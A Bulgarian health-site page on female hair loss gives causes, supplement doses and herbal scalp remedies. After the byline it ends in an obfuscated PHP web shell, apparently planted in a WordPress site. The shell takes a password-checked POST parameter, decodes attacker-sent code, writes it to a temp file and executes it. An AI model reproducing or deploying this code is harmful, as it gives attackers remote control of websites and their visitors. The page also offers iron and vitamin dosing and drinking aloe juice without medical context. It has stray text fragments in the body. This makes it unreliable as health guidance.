Женски косопад – какво да правим | Косопад

Женски косопад – какво да правим

Обикновено, когато косата пада, не би трябвало да се притесняваме, защото бързо пониква нова от същия корен. Когато обаче косата ни расте бавно, новата коса не пониква, а косопадът е все така обилен, трябва вече да погледнем сериозно, защото имаме проблем.

kosopad-sredstva

Предпазването от косопад при жените е напълно постижимо, като наблегнат да плодовете и зеленчуците в храненето си, не увреждат косата си с химии, добавят някои витамини.

Жените губят повече коса с възрастта. Косите на доста изтъняват след менопаузата, като дори на места може да прозира кожата на главата – нарича се женски тип оплешивяване.

Това явление обаче се появява и при млади жени, така че имаме доста повече причини, освен от менопаузата. Може да се получи след раждане, след операция, след треска, заради строга диета за отслабване и пр. Също така може да се получиkosa-baedmovo-maslo заради заболяване, лекарства или неправилни грижи за косата.

Много често женското оплешивяване се дължи на недостиг на вещества – витамини А, В6, В12, фолиева киселина, биотин, витамин С, мед, желязо и цинк. Косопадът може да е знак, че сме прекалили с витамин А или че не го взимаме в достатъчно количество.

ПОДХРАНЕТЕ ТЯЛОТО И КОСАТА

Освен да коригирате недостига на витамини, жените, при които косопадът се дължи на физическа травма, гладуване или проблеми с цикъла, трябва да си вземете силни мултивитамини, 50 млг желязо и 1000 млг витамин С, който помага за усвояването на желязото.

Алое Вера. Нанасяйте гела от растението върху скалпа всяка вечер преди да си легнете. Може да пиете по 2 с.л. сок от алое вера.

Арника. Нанасяйте върху скалпа два пъти дневно под формата на крем или лосион. Увеличава кръвообращението в зоната и така подпомага растежа на косата.

Маслото от жожоба също е доста препоръчително при косопад.

Смесете масло от розмарин с две части масло от бадеми и масажирайте скалпа по 20 минути всеки ден.

01. юни 2014 15:06:17 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | 9 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}